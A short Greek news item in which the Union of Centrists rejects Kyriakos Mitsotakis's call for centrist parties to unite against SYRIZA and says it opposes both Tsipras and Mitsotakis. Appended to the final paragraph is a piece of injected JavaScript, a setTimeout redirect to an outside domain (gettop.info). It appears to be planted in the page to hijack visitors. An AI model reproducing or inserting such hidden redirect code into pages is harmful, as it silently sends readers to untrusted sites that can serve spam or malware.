Ένωση Κεντρώων: Η πρόσκληση Μητσοτάκη αφορά όσους παριστάνουν τους κεντρώους

0
3

 

Την ομιλία του προέδρου της ΝΔ Κυριάκου Μητσοτάκη στην ΚΟ του κόμματος σχολιάζει η Ένωση Κεντρώων αναφέροντας πως «η πρόσκληση Μητσοτάκη δεν αφορά τους κεντρώους, αλλά τους παριστάνοντες ότι είναι κεντρώοι». Αυτή είναι η απάντηση της παράταξης στην πρόσκληση «προς τα ευρωπαϊκά κόμματα του Κέντρου, όπως τα ονόμασε, να συγκροτήσουν μέτωπο κατά του ΣΥΡΙΖΑ», που απηύθυνε ο πρόεδρος της ΝΔ.

Σύμφωνα με την ανακοίνωση, η Ε.Κ υποστηρίζει ότι «ο κ. Μητσοτάκης ξεχνάει, ότι το Κέντρο σημαίνει αγώνας και κατά της Αριστεράς και κατά της Δεξιάς» και συνεπώς «με την πρόσκλησή του κατασκευάζει δήθεν κεντρώους, βολικούς για τον ίδιο για να παραστήσει ότι συγκροτείται μέτωπο».

Η Ένωση Κεντρώων υποστηρίζει ότι «το αληθινό μέτωπο που χρειάζεται ο τόπος είναι αυτό που τιμωρεί τα κόμματα που μας πτώχευσαν, τα κόμματα που έβαλαν υπογραφές υποταγής στους ξένους. Λυπούμαστε στην Ένωση Κεντρώων, αλλά ο αγώνας θα γίνει και κατά του κ. Τσίπρα και κατά του κ. Μητσοτάκη και κατά όλων των υπευθύνων για τον εφιάλτη που ζει η χώρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here